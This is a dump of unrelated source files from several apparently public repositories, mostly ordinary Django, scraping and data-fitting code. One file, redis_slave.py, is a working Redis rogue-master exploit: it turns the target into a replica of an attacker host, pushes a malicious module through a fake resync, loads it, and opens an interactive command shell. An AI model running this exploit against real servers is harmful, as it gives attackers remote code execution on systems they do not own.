6f37df072fb635de324185e8ce476a777756d4a5 | e287ee0313dd611e54f607fe74c1851a88de7ca2 | /tuites/templatetags/tuites_likes.py | 31197b869258bffa49e48bd81034626976bf444a | [] | no_license | gabrielaleal/tuirer-django | 65159f346dd6aac992223e25a546a1b7b2b896d7 | 78d3ae72c20b05a2b706c922361c52fda326a002 | refs/heads/master | 2022-12-11T02:17:13.892559 | 2018-08-07T13:38:47 | 2018-08-07T13:38:47 | 143,877,400 | 0 | 0 | null | 2022-12-08T02:24:04 | 2018-08-07T13:30:43 | Python | UTF-8 | Python | false | false | 440 | py | from django import template
from django.utils.html import format_html
register = template.Library()
@register.simple_tag(takes_context=True)
def tuite_liked_icon(context):
user = context.get('user')
tuite = context.get('tuite')
user_has_liked = tuite.liked_by.filter(pk=user.pk).exists()
if user_has_liked:
return format_html('<i class="fas fa-heart"></i>')
return format_html('<i class="far fa-heart"></i>') | [
"gabriela.leal@hotmail.com"
] | gabriela.leal@hotmail.com |
d55b068d06b5073e94e8d8d64ef02644c79a1ee1 | 1a41588142adebdee4176576f9260c511af4e88a | /account/admin.py | 34f6e94bbe1a4c0d79a90fda6d2b3444141842b2 | [] | no_license | ogzurd/django-new | 7a2cbd915d2dfe070b62f0ab389f1321fe1bd397 | e5dfa36479bd5cae154853c310d834144c3cd210 | refs/heads/master | 2023-05-13T23:13:57.707677 | 2021-05-25T20:46:02 | 2021-05-25T20:46:02 | 358,844,447 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 451 | py | from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from account.models import CustomUserModel
@admin.register(CustomUserModel) #decoratorü ile admin.site.register() olayından kurtulmuş olduk.
class CustomAdmin(UserAdmin):
list_display =(
'username', 'email'
)
fieldsets = UserAdmin.fieldsets + (
('Avatar Değiştirme Alanı', {
'fields' : ['avatar']
}),
)
| [
"ogzurd@icloud.com"
] | ogzurd@icloud.com |
c639300afde098f8880ea4f170b16a2aa369d28c | 0f90bc3f68e674b2a71d940167b9d5702d18d8ba | /finalProject/env/lib/python3.6/abc.py | d3583e61a4a85959762a2d51fc07cc3be07470ea | [] | no_license | pondjames007/DetourningTheWeb | a0f0d730365097b2233c2b9e6ccac0bcc7c113e4 | 49aea061bea449b016eb7b35ff5489c35654dd28 | refs/heads/master | 2021-05-04T05:40:39.881902 | 2018-04-23T20:44:43 | 2018-04-23T20:44:43 | 120,343,116 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 50 | py | /Users/pondjames007/anaconda3/lib/python3.6/abc.py | [
"jameshuang@nyu.edu"
] | jameshuang@nyu.edu |
a77614658ec70f767df7385b6cddebc9026d26de | 7ba16672759e06be70433beb83514051220e20f0 | /Redis/EXP/redis_slave.py | acb3e70f5352d45275fdae11cfc72b4e9018be35 | [] | no_license | ananaskr/Escalation_Database | 6b0747d67659a8ba281f20519f5e62375989640f | 2ae9ce1e5500505df019097477c6a40db4a41183 | refs/heads/master | 2022-04-29T00:33:57.618777 | 2020-04-30T07:59:39 | 2020-04-30T07:59:39 | 256,658,684 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,964 | py | import socket
import time
CRLF = "\r\n"
payload = open("exp.so","rb").read()
exp_filename = "exp.so"
def redis_format(arr):
global CRLF
global payload
redis_arr = arr.split(" ")
cmd = ""
cmd += "*"+str(len(redis_arr))
for x in redis_arr:
cmd += CRLF+"$"+str(len(x))+CRLF+x
cmd += CRLF
return cmd
def redis_connect(shost,sport):
sock = socket.socket()
sock.connect((shost,sport))
return sock
def send(sock,cmd):
sock.send(redis_format(cmd).encode())
print(sock.recv(1024).decode("utf-8"))
def interact_shell(sock):
flag = True
try:
while flag:
shell = input("\033[1;32;40m[*]\033[0m ")
shell = shell.replace(" ","${IFS}")
if shell == "exit" or shell == "quit":
flag = False
else:
send(sock,"system.exec {}".format(shell))
except KeyboardInterrupt:
return
def RogueServer(mport):
global CRLF
global payload
flag = True
result = ""
sock = socket.socket()
sock.bind(("0.0.0.0", mport))
sock.listen(10)
clientSock, address = sock.accept()
while flag:
data = clientSock.recv(1024).decode("utf-8")
if "PING" in data:
result = "+PONG"+CRLF
clientSock.send(result.encode())
flag = True
elif "REPLCONF" in data:
result = "+OK"+CRLF
clientSock.send(result.encode())
flag = True
elif "PSYNC" in data or "SYNC" in data:
result = "+FULLRESYNC "+"a"*40+" 1"+CRLF
result += "$"+str(len(payload))+CRLF
result = result.encode()
result += payload
result += CRLF.encode()
clientSock.send(result)
flag = False
if __name__ == "__main__":
mhost = "docker.for.mac.host.internal"
mport = 6380
shost = "127.0.0.1"
sport = 6379
passwd = ""
redis_sock = redis_connect(shost,sport)
if passwd:
send(redis_sock,"AUTH {}".format(passwd))
send(redis_sock,"SLAVEOF {} {}".format(mhost,mport))
send(redis_sock,"config set dbfilename {}".format(exp_filename))
time.sleep(2)
RogueServer(mport)
send(redis_sock,"MODULE LOAD ./{}".format(exp_filename))
interact_shell(redis_sock) | [
"952634605@qq.com"
] | 952634605@qq.com |
e4e7c3cf651a5d449910e59add06288672f63fb1 | 5a170f40d824e57c6053b0d645ec0d6737cb40c5 | /Prac_01/cp1404 prac1,2.py | c6a9efee241389821530cf167884416c3ee34529 | [] | no_license | izacWL/Cp1404Practicals | 271fbe780b14234778bb284aef09f7a32ba2b179 | 76aa654012b479672182ebea530426cc5968c78e | refs/heads/master | 2020-03-28T03:01:26.142836 | 2018-09-06T04:34:48 | 2018-09-06T04:34:48 | 147,613,867 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 54 | py | for i in range(1, 21, 2):
print(i,end='')
print() | [
"noreply@github.com"
] | izacWL.noreply@github.com |
63ee12c3e6436cfb5389b5fbb0a6b092d87c6fe5 | acbd075e7f409cd172cba62afbced0c42ce53eae | /Website/DMA/DMA/wsgi.py | 5d4d02307c06d649bc0ab96983dffc44b45d6f65 | [] | no_license | IlhanKalkan/dankmemes | 481046cd79ac4f25792b21da159597088b6dfdeb | 3ce4f47b315c91dc6c918dcf007c1d73b1d668bc | refs/heads/master | 2022-03-06T04:45:36.458069 | 2019-11-02T17:15:54 | 2019-11-02T17:15:54 | 168,574,720 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 383 | py | """
WSGI config for DMA project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'DMA.settings')
application = get_wsgi_application()
| [
"i.d.kalkan@students.uu.nl"
] | i.d.kalkan@students.uu.nl |
ff3d5d905ae36e67b425df5f85793c95d78e9187 | 28c75a57ed4fc0e84c69cfe36a0170ec50315dd8 | /server/apps/api/migrations/0018_auto_20200501_0942.py | 6d599721c8901d4310f8163a797dc35633adcd83 | [] | no_license | mskwon1/capstone-2020-21 | 441adf511b9592366c5dd620d764fd76a9cfd129 | e1929401326401a81363ec3997c84caecb618207 | refs/heads/master | 2022-08-24T20:45:46.946606 | 2020-05-25T10:00:54 | 2020-05-25T10:00:54 | 266,690,423 | 1 | 0 | null | 2020-05-25T05:24:17 | 2020-05-25T05:24:17 | null | UTF-8 | Python | false | false | 396 | py | # Generated by Django 3.0.4 on 2020-05-01 09:42
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0017_auto_20200430_2344'),
]
operations = [
migrations.AlterField(
model_name='weather',
name='precipitation',
field=models.FloatField(),
),
]
| [
"mageeeeek@gmail.com"
] | mageeeeek@gmail.com |
83c5bdc03f15bf3062de8e162dc37d0640411c79 | 71c7683331a9037fda7254b3a7b1ffddd6a4c4c8 | /Phys/BsKstKst/python/BsKstKst/FitMassAngles/Param_Diego/for_Juan.py | c5a03c629416915abae29c06369469f6b4fd23be | [] | no_license | pseyfert-cern-gitlab-backup/Urania | edc58ba4271089e55900f8bb4a5909e9e9c12d35 | 1b1c353ed5f1b45b3605990f60f49881b9785efd | refs/heads/master | 2021-05-18T13:33:22.732970 | 2017-12-15T14:42:04 | 2017-12-15T14:42:04 | 251,259,622 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,717 | py | from ROOT import *
from math import *
from array import *
from Urania import PDG
from Urania.Helicity import *
from Urania import RooInterfaces as D
# Generate the pdf using the tools in Urania.Helicity
A = doB2VX([0,1,2], helicities = [0], transAmp = 1)#0)
### masage a bit the expression to make it more suitable for fitting
pdf_split = DecomposeAmplitudes(A,TransAmplitudes.values())#H.values())
pdf_delete = {}
ape = TransAmplitudes["1_pe"]
a_s = TransAmplitudes["0_0"]
for ak in TransAmplitudes.values():
if ape==ak: continue
if a_s==ak: continue
_re, _im = TermsAsReImag(A,ak,ape)
pdf_delete[re(ak*ape.conjugate())]=_re
pdf_delete[im(ak*ape.conjugate())]=_im
pdf_delete[re(ape*ak.conjugate())]=_re
pdf_delete[im(ape*ak.conjugate())]=_im
phys = 0
for key in pdf_split:
if key in pdf_delete.keys():
print "deleting ",key
continue
phys += StrongPhases(key)*pdf_split[key]
### change the free variables to cosines
x = Symbol("helcosthetaK",real = True)
y = Symbol("helcosthetaL", real = True)
z = Symbol("helphi", real = True)
CThL = Cos(ThetaL)
CThK = Cos(ThetaK)
def changeFreeVars(function):
function = function.subs( Sin(2*ThetaK), 2*Sin(ThetaK)*Cos(ThetaK) )
function = function.subs( Cos(2*ThetaK), Cos(ThetaK)**2 - Sin(ThetaK)**2)
function = function.subs( Sin(2*ThetaL), 2*Sin(ThetaL)*Cos(ThetaL) )
function = function.subs( Cos(2*ThetaL), Cos(ThetaL)**2 - Sin(ThetaL)**2)
function = function.subs( Sin(ThetaK), Sqrt(1-Cos(ThetaK)**2))
function = function.subs( Sin(ThetaL), Sqrt(1-Cos(ThetaL)**2))
function = function.subs([(CThK,x),(CThL,y), (Phi,z)])
return function
func = changeFreeVars(phys)
c1_th1 = Symbol("c1th1",real=True)
c2_th1 = Symbol("c2th1",real=True)
c3_th1 = Symbol("c3th1",real=True)
c4_th1 = Symbol("c4th1",real=True)
y_th1 = Symbol("yth1",real=True)
c1_th2 = Symbol("c1th2",real=True)
c2_th2 = Symbol("c2th2",real=True)
c3_th2 = Symbol("c3th2",real=True)
c4_th2 = Symbol("c4th2",real=True)
y_th2 = Symbol("yth2",real=True)
acc_coefs = [c1_th1,c2_th1,c3_th1,c4_th1,y_th1,c1_th2,c2_th2,c3_th2,c4_th2,y_th2]
c5_th1 = y_th1-(1+c1_th1+c2_th1+c3_th1+c4_th1)
c5_th2 = y_th2-(1+c1_th2+c2_th2+c3_th2+c4_th2)
acc1 = 1 + c1_th1*x + c2_th1*x*x + c3_th1*x*x*x + c4_th1*x*x*x*x + c5_th1*x*x*x*x*x
acc2 = 1 + c1_th2*y + c2_th2*y*y + c3_th2*y*y*y + c4_th2*y*y*y*y + c5_th2*y*y*y*y*y
# func = func*acc1*acc2
##### Generate and compile a fitting class corresponding to "func"
### Trial 1, w/o analytical integrals
op = D.RooClassGenerator(func*acc1*acc2, [x,y,z]+TransAmpModuli.values()+TransAmpPhases.values()+acc_coefs,"AngularPDFAcc_2011")
# op = D.RooClassGenerator(func, [x,y,z]+TransAmpModuli.values()+TransAmpPhases.values(),"AngularPDFNoAcc")
op.makePdf(integrable = kTRUE) ## You can also use makeFunc to generate just a RooAbsReal. Still not tested though
op.doIntegral(1,(x,-1,1))
op.doIntegral(2,(y,-1,1))
op.doIntegral(3,(z,-Pi,Pi))
op.doIntegral(4,(x,-1,1),(y,-1,1))
op.doIntegral(5,(x,-1,1),(z,-Pi,Pi))
op.doIntegral(6,(y,-1,1),(z,-Pi,Pi))
op.doIntegral(7,(x,-1,1),(y,-1,1),(z,-Pi,Pi))
op.overwrite()
### Trial 2, now lets generate a version using analytical integrals
# op2 = D.RooClassGenerator(func, [x,y,z]+TransAmpModuli.values()+TransAmpPhases.values()+acc_coefs,"RooSecond")
# op2.makePdf(integrable = kTRUE)
# op2.doIntegral(1,(x,-1,1))
# op2.doIntegral(2,(y,-1,1))
# op2.doIntegral(3,(z,-Pi,Pi))
# op2.doIntegral(4,(x,-1,1),(y,-1,1))
# op2.doIntegral(5,(x,-1,1),(z,-Pi,Pi))
# op2.doIntegral(6,(y,-1,1),(z,-Pi,Pi))
# op2.doIntegral(7,(x,-1,1),(y,-1,1),(z,-Pi,Pi))
# op2.overwrite()
### Compile online the two models and load the class to python
op.invoke()#, op2.invoke()
BREAK
gROOT.ProcessLine(".x RooSecond.cxx+")
############## MAKING TREE
plot = 1
label = 'PLOT'
f = TFile("${WHOME}/NTuples_Bs2KstKst_strip17/public/Bs2KstKst_generated_MC11_angles.root")
tree=f.Get("T")
f1=TFile("/tmp/trash.root","recreate")
tree1 = tree.CopyTree("1")
tree2 = tree.CopyTree("1")
################### CONSTRUCTING THE MODEL
CThetaL = RooRealVar("CosTheta1","cos(ThetaL) ", -1,1)
CThetaK = RooRealVar("CosTheta2","cos(ThetaK) ", -1,1)
Phi = RooRealVar("Phi","Phi", -pi,pi)
A0 = RooRealVar("A0","A0",0.77,0.5,1.)
Apa = RooRealVar("Apa","Apa",0.5,0.3,1.)
As = RooRealVar("As" ,"As" ,1/2,0.,1.)
Ape = RooFormulaVar("Ape","Ape","sqrt(1-As*As-Apa*Apa-A0*A0)",RooArgList(A0,As,Apa))
deltaPa = RooRealVar("deltaPa","deltaPa",2.501,0.,2*pi)
deltaPe = RooRealVar("deltaPe","deltaPe",0.)#1, -pi,pi)
deltaS = RooRealVar("deltaS" ,"deltaS" ,0.9,0.,2*pi)
model=RooFirst("model","model",CThetaK,CThetaL,Phi,Apa,Ape,As,A0,deltaPa,deltaPe,deltaS)
# model2=RooSecond("model2","model2",CThetaK,CThetaL,Phi,Apa,Ape,As,A0,deltaPa,deltaPepi,deltaS)
################### FITTING DATA
### tree - mix of B & Bbar
### tree1 - K+
### tree2 - K-
data = RooDataSet(label, label,tree1,RooArgSet(CThetaL,CThetaK,Phi))
#data = model.generate(RooArgSet(CThetaL,CThetaK,Phi),100000) ;
As.setVal(0)
As.setConstant(kTRUE)
deltaS.setConstant(kTRUE)
#deltaPe.setConstant(kTRUE)
def test(model,cv):
res = model.fitTo(data,RooFit.Minos(kTRUE))#, RooFit.Range("REDUCED"))
cv.Divide(2,2)
cv.cd(1)
Angframe = CThetaK.frame()
data.plotOn(Angframe)
model.plotOn(Angframe)
Angframe.Draw()
cv.cd(2)
Angframeb = CThetaL.frame()
data.plotOn(Angframeb)
model.plotOn(Angframeb)
Angframeb.Draw()
cv.cd(3)
Angframec = Phi.frame()
data.plotOn(Angframec)
model.plotOn(Angframec)
Angframec.Draw()
return res, Angframe, Angframeb, Angframec
cv = TCanvas()
w_1 = test(model,cv)
# w_2 = test(model2)
################ DRAWING
| [
"liblhcb@cern.ch"
] | liblhcb@cern.ch |
c48e575ae1fb8a2c929db8e5ce19ddf8a1db5e42 | 989b3499948137f57f14be8b2c77d0610d5975e6 | /python-package/daily_study/python/question_python(resolved)/chapter4_conditional_and_loops(완결)/iii_five_seven.py | 978209ab4157d0feb585ee846dc3b32fb9719737 | [] | no_license | namkiseung/python_BasicProject | 76b4c070934ad4cb9d16ce844efa05f64fb09ac0 | 460d05248b2d1431624aba960e28bece888643e4 | refs/heads/master | 2022-12-13T21:12:06.865241 | 2020-04-23T01:30:08 | 2020-04-23T01:30:08 | 142,980,920 | 1 | 1 | null | 2022-12-08T02:27:40 | 2018-07-31T07:49:17 | Python | UTF-8 | Python | false | false | 838 | py | # -*- coding: utf-8 -*-
def five_seven(x, y):
""" 전달 받은 두 수(경계 모두 포함)의 범위에서 7로 나눠지면서, 5의 배수인 수의 목록을 "," 로 구분한 문자열로 반환하는 함수를 작성하자
sample in/out:
five_seven(1500, 1600) -> "1505, 1540, 1575"
five_seven(1500, 1700) -> "1505, 1540, 1575, 1610, 1645, 1680"
"""
# 여기 작성
result = ''
# x부터 y 사이 숫자중
for num in range(x, y+1):
if num % 7 == 0 and num % 5 == 0:
result ='',num
print num
else:
continue
# 만약 x가 7로 나누었을때 나머지 0
#만약 x가
return 'success'
if __name__ == "__main__":
print five_seven(1500, 1600)
print five_seven(1500, 1700)
pass
| [
"rlzld100@gmail.com"
] | rlzld100@gmail.com |
324726703696a02fc63bb3ddb69a8b98bf17fbba | b5f5c062a76a396a38165f98c69780670d19a276 | /tark/genenames/models.py | 2141535ec169e3e1404d2b500580cc0163e5b9fa | [
"Apache-2.0"
] | permissive | nerdstrike/tark | 6c6120231a0002cfa160814469ab4ec92bdb3acc | 8b2e4d085abbff7863409e8b4f52c8d203a5c5b6 | refs/heads/master | 2020-12-06T20:22:36.271790 | 2020-01-08T11:10:39 | 2020-01-08T11:10:39 | 232,545,097 | 0 | 0 | Apache-2.0 | 2020-01-08T11:09:59 | 2020-01-08T11:09:59 | null | UTF-8 | Python | false | false | 1,262 | py | """
.. See the NOTICE file distributed with this work for additional information
regarding copyright ownership.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from django.db import models
from session.models import Session
class GeneNames(models.Model):
gene_names_id = models.AutoField(primary_key=True)
external_id = models.CharField(max_length=32, blank=True, null=True, db_index=True)
name = models.CharField(max_length=32, blank=True, null=True)
source = models.CharField(max_length=32, blank=True, null=True)
primary_id = models.IntegerField(blank=True, null=True)
session = models.ForeignKey(Session, models.DO_NOTHING, blank=True, null=True)
class Meta:
managed = False
db_table = 'gene_names'
| [
"prem.apa@gmail.com"
] | prem.apa@gmail.com |
23e5294a7b7449921844e85ddd6f3ba2a5d23c24 | bc1e1e11f77b4a9476a3dfe9259cd8c00d4f1b59 | /covLab/news2.py | eef2c0353ee207a30b3023bfa40d8db31a02ee43 | [] | no_license | covLab/covLabProject | d9b2addb698190b9125fe7908bb658c629bb10e2 | 4660d903391f64d9fb55c5ff675a73416cd44651 | refs/heads/master | 2023-07-09T03:46:54.179655 | 2021-08-09T06:07:19 | 2021-08-09T06:07:19 | 388,896,215 | 0 | 0 | null | 2021-08-08T20:25:53 | 2021-07-23T18:44:38 | JavaScript | UTF-8 | Python | false | false | 741 | py | from bs4 import BeautifulSoup as bs
import requests
# 크롤링할 url 주소
url = 'https://search.naver.com/search.naver?where=news&sm=tab_jum&query=코로나'
# requests 패키지의 함수로 url의 html 문서 가져옴
response = requests.get(url)
html_text = response.text
# bs4 패키지의 함수를 이용해 html 문서를 파싱한다.
soup = bs(html_text, 'html.parser')
# 패키지의 select_one 함수와 선택자 개념을 이용해서 뉴스기사 제목 가져옴
# print(soup.select_one('a.news_tit').get_text())
# 패키지의 select 함수와 선택자 개념을 이용해 누스기사 제목을 모두 가져옴
titles = soup.select('a.news_tit')
for i in titles:
title = i.get_text()
print(title)
| [
"juheelee1103@gmail.com"
] | juheelee1103@gmail.com |
7a8c1e3e34fea493f3dfaeb5fca5ab85cf5acb0d | a4828270932f114289c5dec29b75fb2b5d20fa84 | /ck_163game.py | 9ae0e7e6ee04854e1489dff6870dfb778132fffe | [] | no_license | gold-huiyun/check | d01621008c3f7e9ca680b38414d3625ca0350090 | b1491d59c3a91f0f26cfd8620e2bb4404151f77a | refs/heads/master | 2023-07-08T23:15:41.513429 | 2021-08-07T11:26:11 | 2021-08-07T11:26:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 981 | py | import requests
import json
from getENV import getENv
from checksendNotify import send
"""
建议cron: 20 8 * * *
new Env('网易云游戏');
"""
def game163(Authorization):
headers = {
'user-agent': 'Mozilla/5.0 (Linux; Android 10; Redmi K30 Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/85.0.4183.127 Mobile Safari/537.36',
## 下面填抓包来的参数########
'Authorization': Authorization
}
url = 'http://n.cg.163.com/api/v2/sign-today'
r = requests.post(url, headers=headers).text
if r[0] == "{":
return "cookie已失效"
else:
return "签到成功"
def start():
getENv()
with open("/ql/config/check.json", "r", encoding="utf-8") as f:
datas = json.loads(f.read())
_check_item = datas.get("163game", [])
res = game163(_check_item.get('Authorization'))
print(res)
send("网易云游戏", res)
if __name__ == "__main__":
start() | [
"yuxina158@gmail.com"
] | yuxina158@gmail.com |
14560bfee75c0c1baf3a6855302a488886061a12 | 56c4324b72fe629b218caa881557ec9102db9335 | /client/app/customerrors/error_handlers.py | 174bdbfafc8d83e243aed06d8ab1f9e2f51a0ce0 | [] | no_license | Gwirarien/FHE-Microservice | c25440f8aece546adaa34070c2b32744292fd54b | e7f96caa47258894391e329ecb1a1166e57ee04e | refs/heads/master | 2022-11-06T19:36:42.203562 | 2020-06-19T14:04:57 | 2020-06-19T14:04:57 | 241,149,322 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 466 | py | from flask import render_template
from app.customerrors import customerrors
@customerrors.app_errorhandler(403)
def error_403(error):
return render_template('custom_errors/403_response.html'), 403
@customerrors.app_errorhandler(404)
def error_404(error):
return render_template('custom_errors/404_response.html'), 404
@customerrors.app_errorhandler(500)
def error_500(error):
return render_template('custom_errors/500_response.html'), 500 | [
"obangbranes@yahoo.com"
] | obangbranes@yahoo.com |
b2593039192806f4ff7a7f440cd0cc0ee6d2ff11 | 9f3396ff452dad6674a25f270d3006d35d485428 | /apps/users/form.py | 6abc57190814bfd2070d9bef4a928fa500ecbfb6 | [] | no_license | zuimeideshi/MxOnline | 490d8b885039c3ff03e25825b73553864d434092 | 02ae62abf6301e060c9588af20ddc117524d68e0 | refs/heads/master | 2022-09-26T02:09:54.883866 | 2020-06-02T08:49:09 | 2020-06-02T08:49:09 | 268,747,822 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,007 | py | # users/forms.py
from django import forms
from captcha.fields import CaptchaField
class LoginForm(forms.Form):
'''登录验证表单'''
username = forms.CharField(required=True)
password = forms.CharField(required=True,min_length=5)
class RegisterForm(forms.Form):
'''注册验证表单'''
email = forms.EmailField(required=True)
password = forms.CharField(required=True,min_length=5)
# 验证码
captcha = CaptchaField(error_messages={'invalid':'验证码错误'})
class ForgetPwdForm(forms.Form):
'''忘记密码'''
email = forms.EmailField(required=True)
captcha = CaptchaField(error_messages={'invalid': '验证码错误'})
class UploadImageForm(forms.ModelForm):
'''用户更改图像'''
class Meta:
model = UserProfile
fields = ['image']
class UserInfoForm(forms.ModelForm):
'''个人中心信息修改'''
class Meta:
model = UserProfile
fields = ['nick_name','gender','birthday','address','mobile'] | [
"2448229422@qq.com"
] | 2448229422@qq.com |
7435cb4326ad4524d0fc2e28967a7c3c8443d22e | be5046fe3611e46f4a5e34e8b23e59aacd0976fd | /smartersn/smartertesting/views.py | dc0229242ab408480ce43520001d297f440a4173 | [] | no_license | manvillej/SmarterTestingSN | ebdbc1680f1db2bf8369371e2534a517ee62ad47 | e588baf32f667f538c8c236eb92cbc14fb341406 | refs/heads/master | 2022-12-11T12:53:54.408966 | 2018-08-09T20:37:19 | 2018-08-09T20:37:19 | 143,559,918 | 0 | 0 | null | 2022-12-08T02:21:38 | 2018-08-04T20:11:27 | Python | UTF-8 | Python | false | false | 9,796 | py | from django.shortcuts import render, redirect
from django.views.generic import View
from django.template import loader
from django.http import HttpResponse
from django.db import IntegrityError
from django.contrib.auth import authenticate, login
from django.contrib.auth.decorators import login_required
from django.contrib.auth.mixins import LoginRequiredMixin
import xmltodict
import json
from .forms import UploadFileForm, ObjectTestRelationshipForm, UserForm
from .models import UpdateSet, SNObjectType, SNObject, SNTest, SNTestObjectRelation, Upload, ObjectUploadRelation
from .SNIntegration import SNInstance
@login_required
def uploads(request):
"""returns a list view of of uploads"""
template = loader.get_template("smartertesting/uploads.html")
context = {
"uploads":Upload.objects.all(),
}
# update tests from SN
dev = SNInstance()
dev.get_tests()
return HttpResponse(template.render(context, request))
@login_required
def upload_details(request, upload_id):
"""returns a details view of a upload and a list view of related tests and objects"""
template = loader.get_template("smartertesting/upload_details.html")
# update tests from SN
dev = SNInstance()
dev.get_tests()
upload = Upload.objects.get(id=upload_id)
sn_objects = SNObject.objects.all()
tests = SNTest.objects.all()
object_relations = ObjectUploadRelation.objects.all().filter(upload=upload)
sn_objects = {relation.sn_object for relation in object_relations}
relations = SNTestObjectRelation.objects.all().filter(sn_object__in=sn_objects)
tests = {relation.test for relation in relations}
context = {
"upload":upload,
"sn_objects":sn_objects,
"tests":tests,
}
return HttpResponse(template.render(context, request))
@login_required
def sn_objects(request):
"""returns a list view of sn objects"""
template = loader.get_template("smartertesting/sn_objects.html")
context = {
"sn_objects":SNObject.objects.all(),
}
# update tests from SN
dev = SNInstance()
dev.get_tests()
return HttpResponse(template.render(context, request))
@login_required
def sn_object_details(request, object_id):
"""returns a detail view of an sn object and its related tests"""
# update tests from SN
dev = SNInstance()
dev.get_tests()
template = loader.get_template("smartertesting/sn_object_details.html")
sn_object = SNObject.objects.get(id=object_id)
relations = SNTestObjectRelation.objects.all().filter(sn_object=object_id)
tests = {relation.test for relation in relations}
context = {
"sn_object":sn_object,
"tests":tests,
}
return HttpResponse(template.render(context, request))
@login_required
def sn_tests(request):
"""returns a list view of tests"""
# update tests from SN
dev = SNInstance()
dev.get_tests()
template = loader.get_template("smartertesting/sn_tests.html")
context = {
"tests":SNTest.objects.all(),
}
return HttpResponse(template.render(context, request))
@login_required
def sn_test_details(request, test_id):
"""returns a detail view of a test and a list of its related objects"""
# update tests from SN
dev = SNInstance()
dev.get_tests()
template = loader.get_template("smartertesting/sn_test_details.html")
test = SNTest.objects.get(id=test_id)
relations = SNTestObjectRelation.objects.all().filter(test=test_id)
sn_objects = {relation.sn_object for relation in relations}
context = {
"test":test,
"sn_objects":sn_objects,
}
return HttpResponse(template.render(context, request))
class ObjectTestRelationFormView(LoginRequiredMixin, View):
"""meant for adding tests to an object"""
form_class = ObjectTestRelationshipForm
template_name = "smartertesting/upload.html"
def get(self, request):
""""""
# update tests from SN
dev = SNInstance()
dev.get_tests()
form = self.form_class(None)
return render(request, self.template_name, {'form': form})
def post(self, request):
""""""
form = self.form_class(request.POST)
if(form.is_valid()):
sn_object = form.cleaned_data['sn_object']
test = form.cleaned_data['test']
relationship = form.cleaned_data['relationship']
# catch error if the user tries to create an existing relationship
try:
sn_relation = SNTestObjectRelation(test=test, sn_object=sn_object, description=relationship)
sn_relation.save()
except IntegrityError:
# TODO: tell the user they can't insert the same relationship twice
pass
return render(request, self.template_name, {'form': self.form_class(None)})
class UploadFormView(LoginRequiredMixin, View):
"""form for uploading update sets into application"""
form_class = UploadFileForm
template_name = "smartertesting/upload.html"
def get(self, request):
""""""
form = self.form_class(None)
return render(request, self.template_name, {'form': form})
def post(self, request):
""""""
form = self.form_class(request.POST, request.FILES)
if(form.is_valid()):
xml_file = request.FILES['file']
remote_update_set = xmltodict.parse(xml_file)
updates = remote_update_set["unload"]["sys_update_xml"]
# create upload to add objects against
update_set_name = remote_update_set["unload"]["sys_remote_update_set"]["name"]
update_set_id = remote_update_set["unload"]["sys_remote_update_set"]["sys_id"]
description = remote_update_set["unload"]["sys_remote_update_set"]["description"]
# create upload to log objects against
upload = Upload(
update_set_name=update_set_name,
update_set_id=update_set_id,
description=description,)
upload.save()
# iterate through the updates
for update in updates:
# decode payload xml
# used to skip a particular set of updaes that it can't handle yet
if(not isinstance(update, dict)):
continue
update_payload = xmltodict.parse(update["payload"])
record_update = update_payload["record_update"]
record_update_keys = list(record_update.keys())
# only handling @table for now.
if("@table" in record_update_keys):
table = record_update["@table"]
# get or create the type of SN object
update_type = update["type"]
try:
sn_type = SNObjectType.objects.get(name=update_type)
except SNObjectType.DoesNotExist:
sn_type = SNObjectType(name=update_type, code_name=table)
sn_type.save()
# another unhandled type
if(update_type=="Workflow"):
continue
# print(update_type)
# print(f'{update["type"]}, {table}: {record_update[table]["sys_id"]}')
# print(sorted(list(record_update[table].keys())))
if(update_type=="Business Rule"):
# cart = Cart(customer=user, state=new)
sys_id = record_update[table]["sys_id"]
name = record_update[table]["name"]
try:
sn_object = SNObject.objects.get(sys_id=sys_id)
except SNObject.DoesNotExist:
sn_object = SNObject(sys_id=sys_id, name=name, object_type=sn_type)
sn_object.save()
relation = ObjectUploadRelation(upload=upload, sn_object=sn_object)
relation.save()
else:
"""
known unhandled types:
key = "sys_dictionary"
key = "sys_documentation"
key = "sys_ui_section"
"""
pass
return render(request, self.template_name, {'form': form})
class UserFormView(View):
""""""
# TODO: UserFormView class docstring
form_class = UserForm
template_name = "smartertesting/registration_form.html"
def get(self, request):
"""display a blank form"""
# TODO: UserFormView.get docstring
form = self.form_class(None)
return render(request, self.template_name, {'form': form})
def post(self, request):
"""Process form data"""
# TODO: UserFormView.post docstring
form = self.form_class(request.POST)
if(form.is_valid()):
user = form.save(commit=False)
# cleaned normalized data
username = form.cleaned_data['username']
password = form.cleaned_data['password']
email = form.cleaned_data['email']
user.username = username
user.email = email
# hash the password
user.set_password(password)
user.save()
# returns user object if credentials are correct
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
login(request, user)
return redirect('index')
return render(request, self.template_name, {'form': form})
| [
"jeffmanvillejr@gmail.com"
] | jeffmanvillejr@gmail.com |
0ac4e38308fb4ff518727b8ee1195fa098b9eb57 | 9a94357b2cc45b1e6a56c5c309fad0f717e96b2b | /tests/test_vpx.py | 108360a809ec883ab5d5c6b8521ffbd7c1e719a3 | [
"BSD-3-Clause"
